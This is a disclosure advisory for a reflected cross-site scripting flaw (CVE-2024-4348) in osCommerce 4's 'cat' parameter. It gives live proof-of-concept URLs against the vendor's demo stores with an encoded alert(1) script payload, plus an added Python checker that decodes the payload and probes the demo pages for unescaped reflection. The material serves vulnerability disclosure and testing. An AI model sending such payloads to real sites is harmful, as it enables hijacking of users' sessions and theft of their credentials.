osCommerce 4 Cross Site Scripting
osCommerce version 4 suffers from a cross site scripting vulnerability. Original discovery of cross site scripting in this version is attributed to CraCkEr in November of 2023.
# Exploit Title: osCommerce 4 - Reflected XSS
# Exploit Author: skalvin
# Date: 22/04/2024
# Vendor: osCommerce ltd.
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://demo.oscommerce.com/
# Demo Link: https://demo.oscommerce.com/furniture/
# Tested on: Windows 11 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2024-4348
# VDB: VDB-262488
# CWE: CWE-79 / CWE-74 / CWE-707
# CAPEC: CAPEC-10 / CAPEC-209 / CAPEC-250
# ATT&CK: T1059.007

## Description

An attacker can send the victim a link containing the malicious URL in an email or instant message. A victim who opens it executes attacker-controlled JavaScript in the context of the site, which can perform a wide variety of actions, such as stealing the victim's session token or login credentials.

GET parameter 'cat' is vulnerable to RXSS.

Path: /furniture/catalog/all-products

https://demo.oscommerce.com/furniture/catalog/all-products?cat=[XSS]
https://demo.oscommerce.com/watch/catalog/all-products?cat=[XSS]

## Live POC:

https://demo.oscommerce.com/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1
https://demo.oscommerce.com/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1

Note that in the live PoC the payload is double URL-encoded and is appended to the query string after cat=1; decoded twice it reads bhl4n"><ScRiPt>alert(1)</ScRiPt>iyehb=1. When reproducing, look for that decoded string appearing verbatim (unescaped) in the HTML of the response rather than relying on the alert popup alone.

[-] Done
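The following script is an added example and is not part of the advisory or of osCommerce. It decodes the double-URL-encoded payload from the PoC URLs above, rebuilds the PoC URL for a given demo store, and flags a response body that reflects the decoded markup verbatim (an HTML-escaped reflection does not match). The two sample response bodies are constructed here for illustration, not captured from the demo site; the live fetch only runs when the script is executed directly.

```python
"""Reflection check for the osCommerce 4 reflected-XSS PoC.

Added example (not the advisory's own code). Sample responses below are
constructed, not captured from demo.oscommerce.com.
"""
import html
from urllib.parse import unquote

BASE = "https://demo.oscommerce.com"

# Payload exactly as it appears in the advisory's live PoC query string.
ENCODED_PAYLOAD = (
    "bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1"
)


def decode_payload(encoded: str) -> str:
    """URL-decode twice: %2522 -> %22 -> a literal double quote, and so on."""
    return unquote(unquote(encoded))


def build_poc_url(store: str, cat: str = "1") -> str:
    """Rebuild the PoC URL for one of the demo stores ('furniture', 'watch')."""
    return f"{BASE}/{store}/catalog/all-products?cat={cat}&{ENCODED_PAYLOAD}"


def is_reflected_unescaped(body: str, payload: str) -> bool:
    """True when the decoded markup appears verbatim in the response body.

    An application that HTML-encodes the reflected value emits &lt;ScRiPt&gt;
    instead of <ScRiPt>, so the substring test fails for a patched page.
    """
    return payload in body


def fetch(url: str, timeout: float = 10.0) -> str:
    """Fetch a URL and return its body as text (network access; used only in main)."""
    import urllib.request

    with urllib.request.urlopen(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


DECODED = decode_payload(ENCODED_PAYLOAD)

# Constructed sample responses: one reflecting the payload raw, one escaping it.
VULNERABLE_BODY = f'<input type="hidden" name="{DECODED}" value="1">'
SAFE_BODY = f'<input type="hidden" name="{html.escape(DECODED)}" value="1">'


if __name__ == "__main__":
    print("decoded payload:", DECODED)
    print("constructed vulnerable body reflects raw:",
          is_reflected_unescaped(VULNERABLE_BODY, DECODED))
    print("constructed escaped body reflects raw:",
          is_reflected_unescaped(SAFE_BODY, DECODED))
    for store in ("furniture", "watch"):
        url = build_poc_url(store)
        verdict = "reflected verbatim" if is_reflected_unescaped(fetch(url), DECODED) \
            else "not reflected verbatim"
        print(url, "->", verdict)
```

The substring check is deliberately strict: it only reports a hit when the exact decoded markup, including the mixed-case ScRiPt tag, comes back unencoded, which is the condition under which the alert(1) in the PoC actually fires.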